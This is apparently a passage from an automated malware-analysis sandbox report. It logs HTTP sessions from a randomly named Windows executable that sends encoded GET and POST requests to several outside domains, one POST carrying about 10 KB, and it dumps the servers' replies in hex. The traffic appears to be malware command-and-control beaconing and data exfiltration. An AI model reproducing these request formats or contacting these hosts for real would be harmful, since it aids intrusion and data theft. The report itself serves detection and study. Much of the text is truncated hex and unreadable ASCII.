77 76 4e 6e 5a 73 48 38 6b 6f 57 61 47 6c 6c 49 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=cgzI5r7frz8K20G54nwhdyY0JhomOZnWokkxRHiEcoN3N+ws/OKATAsEL5oyTIH6USOW9bSmkU/oxRshLaNLE6xxpzVe8oq5oSyqApeVqOUbQBjOQKHs1TySY091XUwnA2R2p35D2UzO5wMhwm/SboRiQ7mgLsBITtLVaNBeb9BPG+W14NWuFe1Y8YhRgRsG6GlDZqxt7hMH76panZrRqjRsRTDT0DzCAvftLN9llPw0gtYWjgMxz1562auNw52LrxU5ry/VSuQ8abv8Av+728seJO1cJwr3pBZ06PqMLgZSy6UtoW+ERyAhNqkDYwvNnZsH8koWaGllI5rVaR2Pq7Nk0LqMwpo7XyztFR8yhVrx7IVXsHD91jufdbb/ZTAN51UeL3X2QAB2/2kQgRYb1nZnrZEilSvZqO43/00PPMy8RXZ1vwbNCrWsttg6ba4ILfHkIYw5xZqOlqZ6ioys65YSoErbftL3+Xcq2JC2UN7bUOaC2cAOCHEG2NirGakrv0qH9JbRwFBfWgW7oMfUdm/95qAJ2KKwbRE/CKMHGeyNLomhCUfpuP508CWBRWN+6ikYRVT33LYpfAMi8KowiLjnXJq8vgRPf7nAjjVkZGHGDS7xPyB3nPGfANH39n/6uGrt2bhHmyYHqNJYn8BFwNch6gGYzNGRjLl3Y2YJmfwvRC0T9xyF5G6dF0CTrl1xGZe0t3eTh7+ZSARoyZVrdtrusApas3uGOWjTUXocdKY5Vk6eLR4SFAsawa6+I4o8TU8UQNXSAtYwqI+JqCJmHhf3Y3+NF4eJ7rNDvfb0vknWZg5zip5emooWLNaH5HIMe80GehqXFI68ACTkue1bYW0AYCc+EkhWx62C9bAM1hf0uBhZ3ieSI7/E1dU8fRlOfNbgrc66zAVwlhmYjE7tVmnmwG8rzqCDCMvLJ7D07LfjPSN0Cai7XmmTrBIFphBhawPx5N7eh7NekoPgoju76rNlmwoN0GZHGmKkW6KL1XcHRld [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:43.090595961 CET1236INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:42 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:43.090739012 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                48192.168.2.450055217.160.0.200803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:44.569355011 CET518OUTGET /lnel/?ifzt=Ribo6cOqqFxVl074lXpGE14xRzI3KKS1rVAQT2LhUo1xH+0e39DTDCE0P6QoW4LNcCjE4+6almbk+DseMcJWDalTnHVPsL+WixWnB7fmocU+RCDZF77iizc=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.carsten.studio
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:45:45.806469917 CET1236INHTTP/1.1 200 OK
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 4545
                                                                                                                                                Connection: close
                                                                                                                                                Date: Mon, 25 Nov 2024 08:45:45 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:45:45.806530952 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                                                                                Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                                                                                                Nov 25, 2024 09:45:45.806576014 CET1236INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                                                                                                Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                                                                                                Nov 25, 2024 09:45:45.806618929 CET975INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                                                                                                                Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                49192.168.2.450056107.167.84.42803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:52.221162081 CET780OUTPOST /omhm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.cssa.auction
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.cssa.auction
                                                                                                                                                Referer: http://www.cssa.auction/omhm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 38 59 37 4c 55 69 78 31 4d 6c 64 33 56 30 2f 6b 44 32 30 41 64 61 51 49 6d 62 6a 36 37 30 31 42 44 2f 37 6a 30 39 71 66 59 2f 4a 43 45 2f 4a 45 62 73 31 39 48 4f 32 43 6d 35 72 50 58 46 50 74 46 77 58 6b 73 52 48 32 5a 5a 71 72 55 53 47 4b 62 54 74 77 4c 6e 6d 55 62 4d 67 4a 6f 45 33 73 37 54 2b 39 4b 50 39 6f 38 59 58 4b 68 6f 79 7a 45 51 6a 33 42 6c 41 48 72 72 50 31 6a 6a 58 6b 39 4b 69 77 31 70 37 38 59 49 50 41 6d 66 68 39 61 39 53 49 75 54 4d 55 61 53 79 36 62 77 51 61 33 73 74 6a 72 4f 65 4b 6b 5a 6c 64 4f 79 6b 64 6b 53 7a 67 46 38 45 75 47 4e 2f 51 70 46 2f 73 4d 51 3d 3d
                                                                                                                                                Data Ascii: ifzt=8Y7LUix1Mld3V0/kD20AdaQImbj6701BD/7j09qfY/JCE/JEbs19HO2Cm5rPXFPtFwXksRH2ZZqrUSGKbTtwLnmUbMgJoE3s7T+9KP9o8YXKhoyzEQj3BlAHrrP1jjXk9Kiw1p78YIPAmfh9a9SIuTMUaSy6bwQa3stjrOeKkZldOykdkSzgF8EuGN/QpF/sMQ==
                                                                                                                                                Nov 25, 2024 09:45:53.457506895 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:45:53 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                Nov 25, 2024 09:45:53.457541943 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                50192.168.2.450057107.167.84.42803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:54.887394905 CET800OUTPOST /omhm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.cssa.auction
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.cssa.auction
                                                                                                                                                Referer: http://www.cssa.auction/omhm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 38 59 37 4c 55 69 78 31 4d 6c 64 33 45 6b 50 6b 4d 78 67 41 49 71 51 48 6f 37 6a 36 78 55 30 49 44 2f 2f 6a 30 34 62 48 59 4a 35 43 48 64 42 45 63 75 4e 39 47 4f 32 43 75 5a 72 77 49 56 50 6d 46 77 61 62 73 51 72 32 5a 5a 2b 72 55 51 65 4b 48 31 6c 7a 4c 33 6d 57 43 63 67 48 6c 6b 33 73 37 54 2b 39 4b 4f 5a 53 38 59 50 4b 68 62 71 7a 47 31 58 30 4d 46 41 49 37 62 50 31 79 7a 58 67 39 4b 69 6f 31 74 37 53 59 4f 4c 41 6d 61 64 39 61 6f 79 4a 67 6a 4d 53 43 79 7a 56 58 68 78 73 37 4d 30 79 73 74 36 34 36 6f 4a 58 50 30 70 48 31 6a 53 33 58 38 67 64 62 4b 32 6b 6b 47 43 6c 58 56 4e 77 64 54 6f 32 2b 46 58 52 72 4e 71 56 4f 31 44 6d 63 43 51 3d
                                                                                                                                                Data Ascii: ifzt=8Y7LUix1Mld3EkPkMxgAIqQHo7j6xU0ID//j04bHYJ5CHdBEcuN9GO2CuZrwIVPmFwabsQr2ZZ+rUQeKH1lzL3mWCcgHlk3s7T+9KOZS8YPKhbqzG1X0MFAI7bP1yzXg9Kio1t7SYOLAmad9aoyJgjMSCyzVXhxs7M0yst646oJXP0pH1jS3X8gdbK2kkGClXVNwdTo2+FXRrNqVO1DmcCQ=
                                                                                                                                                Nov 25, 2024 09:45:56.165836096 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:45:55 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                Nov 25, 2024 09:45:56.165909052 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                51192.168.2.450058107.167.84.42803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:45:57.578844070 CET10882OUTPOST /omhm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.cssa.auction
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.cssa.auction
                                                                                                                                                Referer: http://www.cssa.auction/omhm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 38 59 37 4c 55 69 78 31 4d 6c 64 33 45 6b 50 6b 4d 78 67 41 49 71 51 48 6f 37 6a 36 78 55 30 49 44 2f 2f 6a 30 34 62 48 59 4a 78 43 45 76 35 45 61 4a 5a 39 46 4f 32 43 78 70 72 31 49 56 50 37 46 77 44 53 73 51 32 4c 5a 62 47 72 53 46 43 4b 58 41 46 7a 65 48 6d 57 66 4d 67 47 6f 45 33 6c 37 58 53 35 4b 4f 4a 53 38 59 50 4b 68 63 53 7a 42 67 6a 30 4f 46 41 48 72 72 50 44 6a 6a 58 49 39 4b 4b 53 31 74 2b 6e 59 39 44 41 6d 37 74 39 64 63 53 4a 6d 7a 4d 51 58 79 7a 4e 58 68 39 2f 37 4d 6f 2b 73 73 66 6c 36 72 56 58 4e 69 63 6e 68 51 79 42 42 61 35 44 48 72 71 34 38 57 71 44 56 33 42 4f 55 42 41 51 68 6d 4f 34 6f 4d 58 4b 57 77 44 78 49 56 70 6e 6e 73 58 5a 66 63 50 33 68 4f 62 48 68 4a 47 2b 51 4b 6e 59 2b 56 61 4d 46 2b 48 63 68 74 4a 65 66 6a 30 48 73 51 44 78 6a 78 37 38 78 58 55 4c 6a 6a 72 69 64 48 4e 48 4b 34 32 48 73 63 7a 53 36 65 32 71 52 66 35 61 38 50 54 59 67 74 33 2b 32 70 43 35 4b 4c 51 56 49 45 42 62 71 68 74 55 4e 34 66 6a 4e 64 77 2b 49 54 41 58 30 78 47 36 2b 32 46 38 6a [TRUNCATED]
